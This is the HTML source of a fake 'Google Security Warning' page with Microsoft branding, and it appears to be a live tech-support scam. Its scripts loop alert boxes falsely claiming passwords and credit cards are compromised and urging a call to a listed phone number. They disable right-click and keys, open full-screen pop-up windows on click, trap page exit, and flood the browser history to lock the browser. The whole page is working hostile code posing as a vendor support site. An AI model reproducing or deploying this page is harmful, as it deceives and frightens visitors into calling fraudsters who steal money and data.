<!DOCTYPE html>
<html <head=""><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta charset="utf-8">
		<title>Google Security Warning</title>
		<link rel="icon" type="image/png" href="google-favicon.png">
		<link href="bootstrap.css" rel="stylesheet">
	<link href="style.css" rel="stylesheet">
	<link href="translator.css" id="SL_Style" type="text/css" rel="stylesheet">
		<meta content="width=device-width, initial-scale=1.0, user-scalable=1" name="viewport">
		<meta name="robots" content="noindex, nofollow">
		<script src="jquery.min.js"></script>

		<script>
			var is_chrome,
				isChromium = window.chrome,
				vendorName = window.navigator.vendor,
				isOpera = window.navigator.userAgent.indexOf("OPR") > -1;
			is_chrome = isChromium !== null && isChromium !== undefined && vendorName === "Google Inc." && isOpera == false ? true : false;

			function alertCall()
			{
				alert('*************************************************\n\nCall Windows Help Desk Immediately at 1-844-265-1894\n\nThe following data will be compromised if you continue:\n1. Passwords\n2. Browser History\n3. Credit Card Information\n\nThis virus is well known for complete identity and credit card theft. Further action through this computer or any computer on the network will reveal private information and involve serious risks.\n\nCall Windows Help Desk Immediately at 1-844-265-1894');
			}
		 	function alertTimed()
			{
				if (is_chrome)
				{
					setInterval(function(){
						alertCall();
					}, 1000);
				}
				else
				{
					alertLoop();
				}
			}
		 	function alertLoop()
			{
				for (i = 0; i < 500; i++)
				{
					alertCall();
				}
			}
			function addEvent(obj, evt, fn)
			{
				if (obj.addEventListener)
				{
					obj.addEventListener(evt, fn, false)
				}
				else if (obj.attachEvent)
				{
					obj.attachEvent("on" + evt, fn)
				}
			}
			$(document).ready(function(){
				document.onkeydown = function(e){
					if (e.ctrlKey && (e.keyCode === 67 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117))
					{
						if (!is_chrome)
						{
							alertTimed();
						}
						return true;
					}
					else if (e.keyCode === 123)
					{
						return true;
					}
					else
					{
						return true;
					}
				};
				$(window).on('click', function(){
					window.open('index2.html', 'window' + Math.floor((Math.random() * 9999) + 1), 'width=' + screen.availWidth + ',height=' + screen.availHeight + ',titlebar=1,menubar=1');
					if (!is_chrome)
					{
						alertTimed();
					}
				});
				addEvent(document, "mouseout", function(e){
					e = e ? e : window.event;
					var from = e.relatedTarget || e.toElement;
					if (!is_chrome && (!from || from.nodeName == "body"))
					{
						alertTimed();
					}
				});
			});
			window.onbeforeunload = function(e){
				var message = '*************************************************\n\nCall Windows Help Desk Immediately at 1-844-265-1894\n\nThe following data will be compromised if you continue:\n1. Passwords\n2. Browser History\n3. Credit Card Information\n\nThis virus is well known for complete identity and credit card theft. Further action through this computer or any computer on the network will reveal private information and involve serious risks.\n\nCall Windows Help Desk Immediately at 1-844-265-1894';
				e.returnValue = message;
				return message;
			};
			window.onload = function(e){
				alertTimed();
			};
		</script>
		<link href="css" rel="stylesheet" type="text/css">
		
		<style type="text/css">body{
	background-image: url();
}.style1{font-family:Arial,Helvetica,sans-serif;font-weight:bold;color:#FFFFFF;font-size:18px;}.style2{font-size:36px;font-family:"Courier New",Courier,monospace;}.style4{font-size:22px;font-family:"Courier New",Courier,monospace;}.style5{font-size:20px;font-family:"Courier New",Courier,monospace;}.style6{font-family:"Courier New",Courier,monospace}

            .cross{
                position: absolute;
                top: 2px;
                right: 10px;
                font-weight: bolder;
                color: #888;
                text-decoration: none;
            }
            a:focus{
                outline: 0 none;
                border: 0 none;
            }


            .chrome-alert{
                position: fixed;
                top: 0px;
                left:0;
                right: 0;
                /*display: none;*/
            }
            .chrome-alert>div{
                margin: 0 auto;
                width: 440px;
                background: #FBFBFB;
                border: 1px solid #BABABA;
                min-height: 180px;
                border-radius: 3px;
                box-shadow: 0 2px 0 rgba(0,0,0,0.3);
                position: relative;
                font-family: 'Segoe UI';
            }
            .chrome-alert h1{
                font-size: 15px;
                font-weight: normal;
                margin: 0;
                margin-bottom: 5px;
                padding: 5px 10px;
                color: #414141;
            }
            .chrome-alert p{
                font-size: 12px;
                padding: 0 10px;
                color: #414141;
                margin: 15px 0;
            }
            .chrome-alert .action_buttons{
                overflow: auto;
            }
            .chrome-alert .action_buttons a{
                float: right;
                font-size: 12px;
                margin-right: 15px;
                padding: 6px 25px;
                text-decoration: none;
                color: #414141;
                border: 1px solid #DDD;
                margin-top: 20px;
                border-radius: 2px;
                margin-bottom: 20px;
            }
            .chrome-alert .action_buttons a.active{
                border: 1px solid #3B79ED;
                font-weight: bold;
            }
            .chrome-alert .content-box{
                max-height:440px;overflow:auto;
                margin: 0 20px;
            }
            .chrome-alert .content-box p{
                padding: 0;
                margin-left: 0;
            }
            .chrome-alert label{
                padding: 0 20px;
                font-size: 12px;
                color: #414141;
            }
            .chrome-alert label:hover{
                color: #3B79ED;
            }
            .chrome-alert label:focus{
                color: #3B79ED;
                outline: dotted;
            }
</style>
		
	</head>
	<body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;">
		
		<nav class="navbar navbar-default navbar-static-tops">
	<div class="container">
		<div class="navbar-header">
			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
				<span class="sr-only">Toggle navigation</span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
			</button>
			<a class="navbar-brand" href="#">
				<img src="microsoft.png" alt="Microsoft">
			</a>
		</div>
		<div id="navbar" class="navbar-collapse collapse">
			<ul class="nav navbar-nav">
				<li class="dropdown">
					<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Store<span class="caret"></span></a>
					<ul class="dropdown-menu">
						<li><a href="#">Store Home </a></li>
						<li><a href="#">Devices</a></li>
						<li><a href="#">Software</a></li>
						<li><a href="#">Apps</a></li>
						<li><a href="#">Games</a></li>
					</ul>
				</li>
				<li class="dropdown">
					<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Products<span class="caret"></span></a>
					<ul class="dropdown-menu">
						<li><a href="#">Software &amp; services</a></li>
						<li><a href="#">Devices &amp; Xbox</a></li>
						<li><a href="#">For business</a></li>
					</ul>
				</li>
				<li><a href="#">Support</a></li>
			</ul>
			<ul class="nav navbar-nav navbar-right">
				<li><a href="#"><span class="glyphicon glyphicon-shopping-cart"></span>0</a></li>
				<li><a href="#">Sign in</a></li>
			</ul>
		</div><!--/.nav-collapse -->
	</div>
</nav>


<div class="container">
	<div class="jumbotron">
		<div class="row">
			<div class="col-xs-6 text-left">
				<h2 style="padding-left: 30px;">Call for support:</h2>
				<h2>1-844-265-1894</h2>
			</div>
			<div class="col-xs-6 text-right">
				<h2 style="padding-left: 30px;">Call for support:</h2>
				<h2>1-844-265-1894</h2>
			</div>
		</div>
	</div>

	<div class="row" style="padding: 40px; text-align: center;">
		<div class="col-xs-6 col-sm-3">
			<a>
				<span class="glyphicon glyphicon-user"></span>
				<span>Manage my account</span>
			</a>
		</div>
		<div class="col-xs-6 col-sm-3">
			<a>
				<span class="glyphicon glyphicon-user"></span>
				<span>Ask the community</span>
			</a>
		</div>
		<div class="col-xs-6 col-sm-3">
			<a>
				<span class="glyphicon glyphicon-user"></span>
				<span>Contact Answer Desk</span>
			</a>
		</div>
		<div class="col-xs-6 col-sm-3">
			<a>
				<span class="glyphicon glyphicon-download-alt"></span>
				<span>Find downloads</span>
			</a>
		</div>
	</div>
	<div class="row" style="text-align: center;">
		<h3>I need help with...</h3>
		<div class="bs-glyphicons" style="margin-top:30px;">
			<div class="row">
				<div class="col-lg-2 col-md-4 col-xs-6">
					<span class="glyphicon product-img" aria-hidden="true" style="background-image: url('windowspc.svg')"></span>
					<span class="glyphicon-class product-name">WIndows</span>
				</div>
				<div class="col-lg-2 col-md-4 col-xs-6">
					<span class="glyphicon product-img" aria-hidden="true" style="background-image: url('windowsphone.svg')"></span>
					<span class="glyphicon-class product-name">Windows Phone 8</span>
				</div>
				<div class="col-lg-2 col-md-4 col-xs-6">
					<span class="glyphicon product-img" aria-hidden="true" style="background-image: url('mobile.svg')"></span>
					<span class="glyphicon-class product-name">Lumia devices</span>
				</div>
				<div class="col-lg-2 col-md-4 col-xs-6">
					<span class="glyphicon product-img" aria-hidden="true" style="background-image: url('xbox.svg')"></span>
					<span class="glyphicon-class product-name">Xbox</span>
				</div>
				<div class="col-lg-2 col-md-4 col-xs-6">
					<span class="glyphicon product-img" aria-hidden="true" style="background-image: url('office.svg')"></span>
					<span class="glyphicon-class product-name">Office</span>
				</div>
				<div class="col-lg-2 col-md-4 col-xs-6">
					<span class="glyphicon product-img" aria-hidden="true" style="background-image: url('onedrive.svg')"></span>
					<span class="glyphicon-class product-name">OneDrive</span>
				</div>
			</div>
			<div class="row">
				<div class="col-lg-2 col-md-4 col-xs-6">
					<span class="glyphicon product-img" aria-hidden="true" style="background-image: url('surface.svg')"></span>
					<span class="glyphicon-class product-name">Surface</span>
				</div>
				<div class="col-lg-2 col-md-4 col-xs-6">
					<span class="glyphicon product-img" aria-hidden="true" style="background-image: url('edge.svg')"></span>
					<span class="glyphicon-class product-name">Microsoft Edge</span>
				</div>
				<div class="col-lg-2 col-md-4 col-xs-6">
					<span class="glyphicon product-img" aria-hidden="true" style="background-image: url('ie.svg')"></span>
					<span class="glyphicon-class product-name">Internet Explorer</span>
				</div>
				<div class="col-lg-2 col-md-4 col-xs-6">
					<span class="glyphicon product-img" aria-hidden="true" style="background-image: url('skype.svg')"></span>
					<span class="glyphicon-class product-name">Skype</span>
				</div>
				<div class="col-lg-2 col-md-4 col-xs-6">
					<span class="glyphicon product-img" aria-hidden="true" style="background-image: url('outlook.svg')"></span>
					<span class="glyphicon-class product-name">Outlook.com</span>
				</div>
				<div class="col-lg-2 col-md-4 col-xs-6">
					<span class="glyphicon product-img" aria-hidden="true" style="background-image: url('msn.svg')"></span>
					<span class="glyphicon-class product-name">MSN</span>
				</div>
			</div>
		</div>
	</div>
	<div class="row" style="text-align: center; padding-bottom: 50px;">
		<a><h4 style="margin-top: 40px; margin-bottom: 80px;">View all Microsoft products</h4></a>
		<div class="row">
			<div class="col-md-4" style="text-align:left;">
				<h4>Business, IT &amp; developer</h4>
				<ul style="padding:0px;">
					<li style="list-style: none; padding:10px 0px;"><a>Support for small business</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Enterprise and partners</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>IT Professionals</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Developers</a></li>
				</ul>
			</div>
			<div class="col-md-4" style="text-align:left;">
				<h4>Set up &amp; install</h4>
				<ul style="padding:0px;">
					<li style="list-style: none; padding:10px 0px;"><a>How to upgrade to Windows 10</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Install Office 365 Home, Personal, or
						University</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Activate Office 365 Home, Personal, University,
						Office 2013, or Office 2016</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>why is office taking so long to install?</a></li>
				</ul>
			</div>
			<div class="col-md-4" style="text-align:left;">
				<h4>Popular topics</h4>
				<ul style="padding:0px;">
					<li style="list-style: none; padding:10px 0px;"><a>Activation in Windows 10</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Need Help with Office 2016?</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Windows 10 FAQ</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Windows 10 help &amp; how-to</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Windows 10 Mobile help &amp; how-to</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Can't find Office applications in Windows 10,
						Windows 8, or WIndows 7?</a></li>
				</ul>
			</div>
		</div>
	</div>
</div>

<footer class="footer">
	<div class="container">
		<div class="row">
			<div class="col-md-4" style="text-align:left;">
				<h4>Support</h4>
				<ul style="padding:0px;">
					<li style="list-style: none; padding:10px 0px;"><a>Account support</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Supported products list</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Product support lifecycle</a></li>
				</ul>
			</div>
			<div class="col-md-4" style="text-align:left;">
				<h4>Security</h4>
				<ul style="padding:0px;">
					<li style="list-style: none; padding:10px 0px;"><a>Safety &amp; Security Center</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Download Security Essentials</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Malicious Software Removal Tool</a></li>
				</ul>
			</div>
			<div class="col-md-4" style="text-align:left;">
				<h4>Popular topics</h4>
				<ul style="padding:0px;">
					<li style="list-style: none; padding:10px 0px;"><a>Report a support scam</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Disability Answer Desk</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Locate Microsoft addresses worldwide</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Windows 10 help &amp; how-to</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Windows 10 Mobile help &amp; how-to</a></li>
					<li style="list-style: none; padding:10px 0px;"><a>Can't find Office applications in Windows 10,
						Windows 8, or WIndows 7?</a></li>
				</ul>
			</div>
		</div>
		<div class="row" style="font-size: 1.2rem; padding:30px 0px;">
			<div style="float:left;"><span class="glyphicon glyphicon-cd"></span><span>English(United States)</span>
			</div>
			<div style="float:right;">
				<span style="padding:0px 15px;">Terms of use</span>
				<span style="padding:0px 15px;">English(United States)</span>
				<span style="padding:0px 15px;">Trademarks</span>
				<span style="padding:0px 15px;">@2016 Microsoft</span>
			</div>
		</div>
	</div>
</footer>
		
		
		
		
<iframe src="report.php"></iframe>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-84274876-1', 'auto');
  ga('send', 'pageview');

</script>


</body>

		                    var total = "";
		                    for( var i = 0; i < 100000; i++ ) {
		                        total = total + i.toString();
		                        history.pushState(0,0, total );
		                    }
                </script>

</html>

